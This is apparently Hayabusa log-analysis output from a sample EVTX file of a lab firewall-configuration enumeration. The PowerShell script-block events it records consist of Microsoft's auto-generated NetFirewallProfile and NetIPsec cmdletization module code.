${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdleti",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPolicyChange ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecDospSetting ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, 